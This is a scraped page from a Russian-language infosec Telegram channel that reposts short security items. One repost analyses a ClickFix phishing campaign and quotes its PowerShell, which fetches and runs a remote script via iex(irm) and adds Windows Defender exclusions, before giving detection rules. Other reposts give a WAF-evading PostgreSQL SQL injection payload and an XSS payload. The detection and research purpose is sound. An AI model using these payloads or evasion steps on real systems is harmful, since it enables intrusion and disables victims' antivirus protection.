Available now! Telegram Research 2025 — the year's key insights 
Fsecurity | HH
Open in Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Show more2 019
Subscribers
+324 hours
-17 days
-1830 days
Posts Archive
2 019
Repost from CYBERDEN | Хакинг и Кибербезопасность
Полезный Online x86/x64 Assembler. Особенно полезный для быстрой проверки опкодов на наличие "плохих" символов (при разработке шеллкода):
https://defuse.ca/online-x86-assembler.htm
2 019
Repost from Detection is easy
Всем привет! 💻✌️
Давайте разберем способы обхода обнаружения, которые применялись в фишинговой кампании
👨💻 Посмотрим TTP:
🔤Атака начинается с
ClickFix (имитируется обновление системы: синий экран с процентами - всё привычно), в результате чего запускается удалённый скрипт через mshta.exe
🔤Приложение hta запускает powershell.exe с командлетами iex (irm https://example.com/asf)
🔤Теперь самое интересное. Скачанный ps1 начинает свою работу с повышения привилегий (UAC) и добавления исключений в Windows Defender
$uQVLE622ThHArk = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
$uQVLE622ThHArk +=
"; Add-MpPreference -ExclusionPath '$env:WINDIR"
$uQVLE622ThHArk +=
; Add-MpPreference -ExclusionPath '$env: TEMP"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env: USERPROFILE"
$uQVLE622ThHArk +=
Add-MpPreference -ExclusionPath '$env:APPDATA"
$uQVLE622ThHArk += ";
Add-MpPreference -ExclusionPath '$env: LOCALAPPDATA"
$uQVLE622ThHArk += "; Add-MpPreference -ExclusionIpAddress '178.16.55.189', '94.154.35. 25'
powershell.exe с аргументом -Verb RunAs
$aXNXjSqHUpLoYk = Start-Process powershell.exe
-ArgumentList "-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass - Command
`$ErrorActionPreference='Stop'; $uQVLE622ThHArk" `
-Verb RunAs `
-PassThru
Add-MpPreference, Set-MpPreference, -Exclusion*
🔤 отслеживаем создание новых значений в ключах реестра HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\
🔤 отслеживаем события
ProviderName = "Microsoft-Windows-Windows Defender/Operational" AND EventId=5007 AND NewValue contains "Microsoft\Windows Defender\Exclusions"
#detection@detectioneasy
#ttp@detectioneasy2 019
Repost from Заметки Слонсера
Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты
На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным.
Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request.
Придумал обход используя dollar-quoting синтаксис PostgreSQL:
$$0$$OR-0-$$0$$NOTNULLКак PostgreSQL это парсит: 1. $$0$$ - dollar-quoted строка, автоматически каститься в integer 2. OR - логический оператор 3. -0-$$0$$ - арифметическое выражение 4. NOTNULL - проверка на null (вернет true) Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +). Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.
2 019
Repost from 8ug8ear
Иногда сложно снаружи оценить влияние бага на бизнес
В прошлом посте я говорила об анализе влияния уязвимости на систему с точки зрения бизнеса. Но делать это снаружи бывает сложно. Не всегда занимаюсь анализом активов вендоров, иногда хочется просто зайти на пару часов и поискать баги. Режим развлекательный, как в CTF. Что-то могу упустить или сам бизнес считает эту фичу не критичной.
Часть багов я промахиваюсь с оценкой иногда повышая, а иногда понижая судя по дубликатам и тому, что иногда поднимают уровень или платят выше вилки (спасибо за рыбу).
Нашла баг, оценила ее как "Медиум". Вендор понизил до "Низкого" со следующим комментарием.
Получился практически анекдот. Это что получается багхантер санитар леса? Тут у меня 0 вопросов - полностью согласна с вендором, но смеюсь с этого очень сильно.
2 019
Repost from BugXplorer
From Invalid Tag to Script Execution
<0 name="<svg/onload=alert()>">